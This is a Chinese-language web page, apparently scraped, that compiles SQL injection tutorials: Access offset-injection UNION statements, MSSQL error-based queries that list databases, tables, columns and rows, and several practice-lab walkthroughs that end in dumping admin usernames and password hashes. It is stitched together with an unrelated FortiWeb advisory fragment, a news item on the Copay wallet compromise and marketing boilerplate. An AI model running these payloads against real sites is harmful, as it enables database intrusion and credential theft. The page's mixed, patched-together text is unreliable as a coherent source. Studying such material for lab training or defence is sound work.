整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
SQL作用在關系型數據庫上面,什么是關系型數據庫?關系型數據庫是由一張張的二維表組成的, 常見的關系型數據庫廠商有MySQL、SQLite、SQL Server、Oracle,由于MySQL是免費的,所以企業一般用MySQL的居多。Web SQL是前端的數據庫,它也是本地存儲的一種,使用SQLite實現,SQLite是一種輕量級數據庫,它占的空間小,支持創建表,插入、修改、刪除表格數據,但是不支持修改表結構,如刪掉一縱列,修改表頭字段名等。但是可以把整張表刪了。同一個域可以創建多個DB,每個DB有若干張表。
與數據庫產生交互就有可能存在注入攻擊,不只是MySQL數據庫,還有Oracle,MongoDB等數據庫也可能會存在注入攻擊。
數據庫架構組成,數據庫高權限操作
Access,Mysql,mssql(Microsoft SQL server),mongoDB,postgresql,sqlite,oracle,sybase等
Access
表名
列名
數據
Access數據庫保存在網站源碼下面,自己網站數據庫獨立存在,所以無法進行跨庫,也沒有文件讀寫的操作。
除了Access其他數據庫組成架構基本都是大同小異。
mysql mssql等
數據庫名A
表名
列名
數據
數據庫名B
。。。。。。
每個數據庫功能不同,我們采取注入的時候攻入方式不同
什么決定網站注入點用戶權限?
數據庫配置文件的用戶,是誰連接的
如果遇到列名猜解不到的情況,則可以使用Access偏移注入
借用數據庫的自連接查詢讓數據庫內部發生亂序,從而偏移出所需要的字段在我們的頁面上顯示
解決知道Access數據庫中知道表名,但是得不到字段的sql注入困境
a. 成功與否看技巧與運氣,不能保證100%成功。
b. 無需管理員賬號密碼字段,直接爆賬號密碼
a. 已知管理表名
b. 已知任意字段(一個或多個會增加機率,最常見的就是id)
a. 管理表的字段數越少越好(最好是三個:id 賬號字段 密碼字段)
b. 當前注入點的腳本內查詢的表內的字段數越多越好
a. 判斷字段數
b. 判斷表名
c. 開始偏移注入
本地Access偏移注入靶場
偏移量就是逐步增加或遞減,直到出現結果。*表示可代替的字符串,用*代替22,返回界面依舊報錯,然后用*代替21,依次遞減。22-16=6,6表示該表中的列名個數。
*代表6個,后面一串字符代表兩倍,就相當于2倍*,12個
爆列名數據
一級偏移語句:union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id=b.id)
二級偏移語句:union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)二級偏移,3倍*,所以為18個
查看登錄框源代碼的表單值或觀察URL特征等也可以針對表或列獲取不到的情況
猜解表名可能是ZB_admin,觀察網站地址特征,是否有前綴。
或者看登錄框表單值
Microsoft SQL Server 是一個全面的數據庫平臺,使用集成的商業智能 (BI)工具提供了企業級的數據管理。Microsoft SQL Server 數據庫引擎為關系型數據和結構化數據提供了更安全可靠的存儲功能,使您可以構建和管理用于業務的高可用和高性能的數據應用程序。
①判斷數據庫類型
and exists (select * from sysobjects)--返回正常為mssql(也名sql server)
and exists (select count(*) from sysobjects)--有時上面那個語句不行就試試這個哈
②判斷數據庫版本
and 1=@@version--這個語句要在有回顯的模式下才可以哦
and substring((select @@version),22,4)='2008'--適用于無回顯模式,后面的2008就是數據庫版本, 返回正常就是2008的復制代碼第一條語句執行效果圖(類似):第二條語句執行效果圖:(如果是 2008的話就返回正常)
③獲取所有數據庫的個數 (一下3條語句可供選擇使用)
1. and 1=(select quotename(count(name)) from master..sysdatabases)--
2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --
3. and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --
說明:dbid從1-4的數據庫一般為系統數據庫.
⑤獲取數據庫 (該語句是一次性獲取全部數據庫的,且語句只適合>=2005,兩條語句可供選擇使用)
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--
⑥獲取當前數據庫
and db_name()>0
and 1=(select db_name())--
⑦獲取當前數據庫中的表(有2個語句可供選擇使用)【下列語句可一次爆數據庫所有表(只限于 mssql2005及以上版本)】
and 1=(select quotename(name) from 數據庫名..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 數據庫名..sysobjects where xtype='U' FOR XML PATH(''))--
⑧獲得表里的列
一次爆指定表的所有列(只限于mssql2005及以上版本):
and 1=(select quotename(name) from 數據庫名..syscolumns where id=(select id from 數據庫名..sysobjects where name='指定表名') FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 數據庫名..syscolumns where id=(select id from 數據庫名..sysobjects where name='指定表名') FOR XML PATH(''))--
⑨獲取指定數據庫中的表的列的數據庫
逐條爆指定表的所有字段的數據(只限于mssql2005及以上版本):
and 1=(select top 1 * from 指定數據庫..指定表名 where排除條件 FOR XML PATH(''))--
一次性爆N條所有字段的數據(只限于mssql2005及以上版本):
and 1=(select top N * from 指定數據庫..指定表名 FOR XML PATH(''))--復制代碼第一條語句:and 1=(select top 1 * from 指定數據庫..指定表名 FOR XML PATH(''))--測試效果圖:----------------------------------加上where條件篩選結果出來會更加好,如:where and name like '%user%' 就會篩選出含有user關鍵詞的出來。用在篩選表段時很不錯。
轉自:http://www.myhack58.com/Article/html/3/8/2015/63146.htm
https://www.webshell.cc/524.html
https://www.cnblogs.com/yilishazi/p/14710349.html
https://www.jianshu.com/p/ba0297da2c2e
https://www.cnblogs.com/peterpan0707007/p/8242119.html
https://blog.csdn.net/weixin_33881753/article/details/87981552
https://www.secpulse.com/archives/3278.html
1.找到注入點 and 1=1 and 1=2 測試報錯
2.order by 5 # 到5的時候報錯,獲取字段總數為4
3.id=0(不是1就行,強行報錯) union select 1,2,3,4 # 聯合查詢,2和3可以顯示信息
4.獲取數據庫信息
user()==>root
database()==>mozhe_Discuz_StormGroup
version()==>5.7.22-0ubuntu0.16.04.1
5.獲取數據庫表
table_name 表名
information_schema.tables 系統生成信息表
table_schema=數據庫名16進制或者用單引號括起來
改變limit 0,1中前一個參數,得到兩個表 StormGroup_member notice
6.獲取列名
結果如下 id,name,password,status
7.脫褲
1.and 1=2 報錯找到注入點
2.order by 獲取總字段
3.猜解表名 and exists (select * from admin) 頁面返回正常,說明存在admin表
4.猜解列名 and exists(select id from admin) 頁面顯示正常,admin表中存在id列 username,passwd 同樣存在
5.脫褲 union select 1,username,passwd,4 from admin
1.and 1=2報錯
2.order by N# 獲取總字段
3.猜表名 and exists(select * from manage) 表名manage存在
4.猜解列名 and exists(select id from manage) 列名id存在,同樣username,password也存在
5.脫褲 and exists (select id from manage where id=1 ) 證明id=1存在
and exists (select id from manage where%20 len(username)=8 and id=1 ) 猜解username字段長度為8
and exists (select id from manage where%20 len(password)=16 and id=1 ) 猜解password字段長度為16
可用Burp的Intruder功能輔助猜解
猜解username第1到8位的字符,ASCII轉碼 admin_mz
猜解password第1到16位的字符,ASCII轉碼(Burp 爆破)
轉ASCII的py腳本:
72e1bfc3f01b7583 MD5解密為97285101
1.找注入點 and 1=1
2.order by N 猜字段 4
3.猜數據庫
offset==>0~2
有三個數據庫:
WSTMart_reg
notice_sybase
sqlite_sequence
4.猜列
共有3個字段:
id,name,password
5.脫褲
1.id=1′ 單引號注入報錯
2.閉合語句,查看所有集合
3.查看指定集合的數據
[0] 代表第一條數據,可遞增
1.and 1=2 判斷注入點
2.order by N 獲取字段數
3.爆當前數據庫
GAME_CHARACTER
4.列表
NAME
5.脫褲
1.and 1=2 判斷注入點
2.order by N 獲取字段
3.爆數據庫
4.列表
5.列字段
6.拖庫
1.and 1=2 判斷注入點
2.order by N 獲取總字段
3.爆數據庫
4.列表
5.列字段
6.查狀態
結果為:zhang
7.反選爆用戶名
結果為:mozhe
8.猜解密碼
1.and 1=1
2.order by
3.爆數據庫
4.列表
5.列字段
6.拖庫
加上狀態:1 where STATUS=1
影響系統:
Fortinet FortiWeb < 5.8.1
Fortinet FortiWeb < 5.7.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 101916
CVE(CAN) ID: CVE-2017-7736
FortiGate系列安全產品可檢測和消除網絡威脅。
Fortinet Fortiweb < 5.8.1、5.7.2版本在實現上存在HTML注入漏洞,成功利用后可使攻擊者在受影響站點上下文中執行HTML及腳本代碼。
<*來源:Hassan Kooshkaki
*>
建議:
--------------------------------------------------------------------------------
廠商補丁:
Fortinet
--------
目前廠商已經發布了升級補丁以修復這個安全問題,請到廠商的主頁下載:
http://www.fortinetfirewall.com/index.ph
言財經 11月27日消息,黑客利用惡意代碼獲得(合法)訪問熱門JavaScript庫,通過注射惡意代碼從BitPay的Copay錢包應用中竊取比特幣(BTC)和比特幣現金(BCH)。目前已經確認9月至11月期間,所有版本的Copay錢包都被認為已被感染。今天早些時候,BitPay團隊發布了Copay v5.2.2,已經刪除Event-Stream和Flatmap-Stream依賴項。
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
